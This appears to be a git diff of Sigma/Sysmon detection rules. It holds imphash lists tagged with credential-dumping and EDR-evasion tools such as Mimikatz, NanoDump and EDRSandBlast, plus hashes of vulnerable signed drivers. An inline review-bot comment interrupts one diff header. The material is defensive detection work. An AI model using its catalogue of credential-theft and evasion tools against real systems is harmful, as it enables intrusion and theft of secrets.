IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz + - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz + - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz + - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz + - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz + - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz + - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz + - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz + - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz + - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz + - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz + - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz + - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - 
IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - 
IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz + - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller + - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller + - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab + - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab + - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab + - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia + - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast + - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast + - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast + - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast + - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast + - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast + - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast + - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer condition: create_stream_hash and selection falsepositives: - Unknown diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml index 38844ac37..078a0e580 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml 
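Review bot: The comment on the new `Hash|contains:` key reads `# Sysmon field hashes contains all types`; suggest `# The Sysmon "Hashes" field carries every configured hash type, so match on the IMPHASH= substring` — beyond the subject/verb agreement, naming the field explains why the same list is repeated under two keys. Two smaller points in the same hunk: the annotation `# ShaprEvtMute Hook` looks like a transposition of SharpEvtMute, and the values mix cases (`09D278F9…` and `84B763C4…` are uppercase in the `Imphash` list while `bf6223a4…`, `03866661…` and `e57401fb…` are lowercase in the `IMPHASH=` list). Sigma string matching is case-insensitive by default, so this should not change results, but normalising the case would let the two lists be diffed against each other cleanly.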
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml
@@ -1,8 +1,7 @@
 title: Exports Registry Key To an Alternate Data Stream
 id: 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84
 status: test
-description: Exports the target Registry key and hides it in the specified alternate
- data stream.
+description: Exports the target Registry key and hides it in the specified alternate data stream.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Regedit/
 - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml
index f7dcd7e70..ca5d59440 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml
@@ -1,8 +1,7 @@
 title: Potential Suspicious Winget Package Installation
 id: a3f5c081-e75b-43a0-9f5b-51f26fe5dba2
 status: experimental
-description: Detects potential suspicious winget package installation from a suspicious
- source.
+description: Detects potential suspicious winget package installation from a suspicious source.
 references:
 - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -21,6 +20,7 @@ detection:
 selection:
 Contents|startswith: '[ZoneTransfer] ZoneId=3'
 Contents|contains:
+ # Note: Add any untrusted sources that are custom to your env
 - ://1
 - ://2
 - ://3
diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml
index abc71ce12..e1cad2667 100644
--- a/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml
+++ b/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml
@@ -1,8 +1,7 @@
 title: Potentially Suspicious File Download From ZIP TLD
 id: 0bb4bbeb-fe52-4044-b40c-430a04577ebe
 status: experimental
-description: Detects the download of a file with a potentially suspicious extension
- from a .zip top level domain.
+description: Detects the download of a file with a potentially suspicious extension from a .zip top level domain.
 references:
 - https://twitter.com/cyb3rops/status/1659175181695287297
 - https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/
@@ -43,7 +42,6 @@ detection:
 - .zip:Zone
 condition: create_stream_hash and selection
 falsepositives:
- - Legitimate file downloads from a websites and web services that uses the ".zip"
- top level domain.
+ - Legitimate file downloads from a websites and web services that uses the ".zip" top level domain.
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml b/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml
index 3be873e89..94a76ccde 100644
--- a/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml
+++ b/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml
@@ -1,17 +1,10 @@
 title: Suspicious Remote Thread Target
 id: f016c716-754a-467f-a39e-63c06f773987
 status: deprecated
-description: 'Offensive tradecraft is switching away from using APIs like "CreateRemoteThread",
- however, this is still largely observed in the wild.
-
- This rule aims to detect suspicious processes (those we would not expect to behave
- in this way like winword.exe or outlook.exe) creating remote threads on other
- processes.
-
- It is a generalistic rule, but it should have a low FP ratio due to the selected
- range of processes.
-
- '
+description: |
+ Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild.
+ This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.
+ It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
 references:
 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
 author: Florian Roth (Nextron Systems)
@@ -29,9 +22,9 @@ detection:
 - \spoolsv.exe
 - \notepad.exe
 filter:
- - SourceImage|endswith: \csrss.exe
- - SourceImage|contains: unknown process
- - StartFunction: EtwpNotificationThread
+ - SourceImage|endswith: \csrss.exe
+ - SourceImage|contains: unknown process
+ - StartFunction: EtwpNotificationThread
 condition: create_remote_thread and (selection and not filter)
 fields:
 - ComputerName
diff --git a/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml b/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml
index 33550df19..28f8ef46c 100644
--- a/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml
@@ -1,15 +1,13 @@
 title: Credential Dumping Tools Service Execution
 id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2
 related:
- - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
- type: derived
+ - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
+ type: derived
 status: deprecated
-description: Detects well-known credential dumping tools execution via service execution
- events
+description: Detects well-known credential dumping tools execution via service execution events
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
 date: 2017/03/05
 modified: 2023/12/11
 tags:
diff --git a/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml b/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml
index 26178dd98..ac2ec4b0c 100644
--- a/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml
@@ -1,8 +1,7 @@
 title: Usage Of Malicious POORTRY Signed Driver
 id: 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6
 status: deprecated
-description: Detects the load of the signed poortry driver used by UNC3944 as reported
- by Mandiant and Sentinel One.
+description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
 references:
 - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -48,27 +47,27 @@ detection:
 - MD5=ee6b1a79cb6641aa44c762ee90786fe0
 - MD5=909f3fc221acbe999483c87d9ead024a
 selection_hash:
- - sha256:
- - 0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc
- - 9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c
- - 8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104
- - d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c
- - 05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4
- - c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497
- - sha1:
- - 31cc8718894d6e6ce8c132f68b8caaba39b5ba7a
- - a804ebec7e341b4d98d9e94f6e4860a55ea1638d
- - 6debce728bcff73d9d1d334df0c6b1c3735e295c
- - cc65bf60600b64feece5575f21ab89e03a728332
- - 3ef30c95e40a854cc4ded94fc503d0c3dc3e620e
- - b2f955b3e6107f831ebe67997f8586d4fe9f3e98
- - md5:
- - 10f3679384a03cb487bda9621ceb5f90
- - 04a88f5974caa621cee18f34300fc08a
- - 6fcf56f6ca3210ec397e55f727353c4a
- - 0f16a43f7989034641fd2de3eb268bf1
- - ee6b1a79cb6641aa44c762ee90786fe0
- - 909f3fc221acbe999483c87d9ead024a
+ - sha256:
+ - 0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc
+ - 9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c
+ - 8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104
+ - d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c
+ - 05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4
+ - c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497
+ - sha1:
+ - 31cc8718894d6e6ce8c132f68b8caaba39b5ba7a
+ - a804ebec7e341b4d98d9e94f6e4860a55ea1638d
+ - 6debce728bcff73d9d1d334df0c6b1c3735e295c
+ - cc65bf60600b64feece5575f21ab89e03a728332
+ - 3ef30c95e40a854cc4ded94fc503d0c3dc3e620e
+ - b2f955b3e6107f831ebe67997f8586d4fe9f3e98
+ - md5:
+ - 10f3679384a03cb487bda9621ceb5f90
+ - 04a88f5974caa621cee18f34300fc08a
+ - 6fcf56f6ca3210ec397e55f727353c4a
+ - 0f16a43f7989034641fd2de3eb268bf1
+ - ee6b1a79cb6641aa44c762ee90786fe0
+ - 909f3fc221acbe999483c87d9ead024a
 condition: driver_load and (1 of selection*)
 falsepositives:
 - Legitimate BIOS driver updates (should be rare)
diff --git a/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml b/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml
index 4ec57b1cb..b103e78df 100644
--- a/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml
@@ -1,8 +1,8 @@
 title: PowerShell Scripts Run by a Services
 id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073
 related:
- - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
- type: derived
+ - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
+ type: derived
 status: deprecated
 description: Detects powershell script installed as a Service
 references:
diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml
index adceab552..00cc50aa4 100644
--- a/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml
@@ -1,8 +1,7 @@
 title: Vulnerable AVAST Anti Rootkit Driver Load
 id: 7c676970-af4f-43c8-80af-ec9b49952852
 status: deprecated
-description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver
- often used by threat actors or malware for stopping and disabling AV and EDR products
+description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
 references:
 - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -25,14 +24,14 @@ detection:
 - SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4
 - SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1
 selection_other:
- - md5: a179c4093d05a3e1ee73f6ff07f994aa
- - sha1: 5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4
- - sha256: 4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1
+ - md5: a179c4093d05a3e1ee73f6ff07f994aa
+ - sha1: 5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4
+ - sha256: 4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1
 driver_img:
 ImageLoaded|endswith: \aswArPot.sys
 driver_status:
- - Signed: 'false'
- - SignatureStatus: Expired
+ - Signed: 'false'
+ - SignatureStatus: Expired
 condition: driver_load and (1 of selection* or all of driver_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml
index 57ae0dda7..60c4d1e07 100644
--- a/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml
@@ -1,8 +1,7 @@
 title: Vulnerable Dell BIOS Update Driver Load
 id: 21b23707-60d6-41bb-96e3-0f0481b0fed9
 status: deprecated
-description: Detects the load of the vulnerable Dell BIOS update driver as reported
- in CVE-2021-21551
+description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
 references:
 - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
 author: Florian Roth (Nextron Systems)
@@ -32,15 +31,15 @@ detection:
 - MD5=C996D7971C49252C582171D9380360F2
 - MD5=D2FD132AB7BBC6BBB87A84F026FA0244
 selection_hash:
- - sha256:
- - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5
- - ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1
- - sha1:
- - c948ae14761095e4d76b55d9de86412258be7afd
- - 10b30bdee43b3a2ec4aa63375577ade650269d25
- - md5:
- - c996d7971c49252c582171d9380360f2
- - d2fd132ab7bbc6bbb87a84f026fa0244
+ - sha256:
+ - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5
+ - ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1
+ - sha1:
+ - c948ae14761095e4d76b55d9de86412258be7afd
+ - 10b30bdee43b3a2ec4aa63375577ade650269d25
+ - md5:
+ - c996d7971c49252c582171d9380360f2
+ - d2fd132ab7bbc6bbb87a84f026fa0244
 condition: driver_load and (1 of selection*)
 falsepositives:
 - Legitimate BIOS driver updates (should be rare)
diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml
index 53c1df8c3..34c05546b 100644
--- a/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml
@@ -1,8 +1,8 @@
 title: Vulnerable Driver Load By Name
 id: 39b64854-5497-4b57-a448-40977b8c9679
 related:
- - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8
- type: derived
+ - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8
+ type: derived
 status: deprecated
 description: Detects the load of known vulnerable drivers via their names only.
 references:
@@ -366,10 +366,7 @@ detection:
 - \amsdk.sys
 condition: driver_load and selection
 falsepositives:
- - False positives may occur if one of the vulnerable driver names mentioned above
- didn't change its name between versions. So always make sure that the driver
- being loaded is the legitimate one and the non-vulnerable version.
- - If you experience a lot of FP you could comment the driver name or its exact
- known legitimate location (when possible)
+ - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version.
+ - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)
 level: low
 ruletype: Sigma
diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml
index 14a5fa33b..01cf838db 100644
--- a/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml
@@ -1,8 +1,7 @@
 title: Vulnerable GIGABYTE Driver Load
 id: 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647
 status: deprecated
-description: Detects the load of a signed and vulnerable GIGABYTE driver often used
- by threat actors or malware for privilege escalation
+description: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation
 references:
 - https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b
 - https://twitter.com/malmoeb/status/1551449425842786306
@@ -32,15 +31,15 @@ detection:
 - SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427
 - SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B
 selection_other:
- - md5:
- - 9ab9f3b75a2eb87fafb1b7361be9dfb3
- - c832a4313ff082258240b61b88efa025
- - sha1:
- - fe10018af723986db50701c8532df5ed98b17c39
- - 1f1ce28c10453acbc9d3844b4604c59c0ab0ad46
- - sha256:
- - 31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427
- - cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b
+ - md5:
+ - 9ab9f3b75a2eb87fafb1b7361be9dfb3
+ - c832a4313ff082258240b61b88efa025
+ - sha1:
+ - fe10018af723986db50701c8532df5ed98b17c39
+ - 1f1ce28c10453acbc9d3844b4604c59c0ab0ad46
+ - sha256:
+ - 31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427
+ - cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b
 condition: driver_load and (1 of selection*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml
index 94aca85ed..8e812fe5b 100644
--- a/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml
@@ -1,8 +1,7 @@
 title: Vulnerable HW Driver Load
 id: 9bacc538-d1b9-4d42-862e-469eafc05a41
 status: deprecated
-description: Detects the load of a legitimate signed driver named HW.sys by often
- used by threat actors or malware for privilege escalation
+description: Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation
 references:
 - https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/
 - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details
@@ -34,18 +33,18 @@ detection:
 - MD5=376B1E8957227A3639EC1482900D9B97
 - MD5=45C2D133D41D2732F3653ED615A745C8
 selection_other:
- - sha256:
- - 4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8
- - 55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa
- - 6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5
- - sha1:
- - 74e4e3006b644392f5fcea4a9bae1d9d84714b57
- - 18f34a0005e82a9a1556ba40b997b0eae554d5fd
- - 4e56e0b1d12664c05615c69697a2f5c5d893058a
- - md5:
- - 3247014ba35d406475311a2eab0c4657
- - 376b1e8957227a3639ec1482900d9b97
- - 45c2d133d41d2732f3653ed615a745c8
+ - sha256:
+ - 4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8
+ - 55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa
+ - 6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5
+ - sha1:
+ - 74e4e3006b644392f5fcea4a9bae1d9d84714b57
+ - 18f34a0005e82a9a1556ba40b997b0eae554d5fd
+ - 4e56e0b1d12664c05615c69697a2f5c5d893058a
+ - md5:
+ - 3247014ba35d406475311a2eab0c4657
+ - 376b1e8957227a3639ec1482900d9b97
+ - 45c2d133d41d2732f3653ed615a745c8
 condition: driver_load and (1 of selection*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml
index e4c925f73..565a22650 100644
--- a/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml
+++ b/sigma/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml
@@ -1,8 +1,7 @@
 title: Vulnerable Lenovo Driver Load
 id: ac683a42-877b-4ff8-91ac-69e94b0f70b4
 status: deprecated
-description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699
- which can be used to escalate privileges
+description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
 references:
 - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities
 - https://github.com/alfarom256/CVE-2022-3699/
@@ -27,9 +26,9 @@ detection:
 - SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F
 - MD5=B941C8364308990EE4CC6EADF7214E0F
 selection_hash:
- - sha256: f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe
- - sha1: b89a8eef5aeae806af5ba212a8068845cafdab6f
- - md5: b941c8364308990ee4cc6eadf7214e0f
+ - sha256: f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe
+ - sha1: b89a8eef5aeae806af5ba212a8068845cafdab6f
+ - md5: b941c8364308990ee4cc6eadf7214e0f
 condition: driver_load and (1 of selection*)
 falsepositives:
 - Legitimate driver loads (old driver that didn't receive an update)
diff --git a/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml b/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml
index 7fa552b27..eba0e963c 100644
--- a/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml
+++ b/sigma/sysmon/deprecated/file_event_win_hktl_createminidump.yml
@@ -2,10 +2,9 @@ title: CreateMiniDump Hacktool
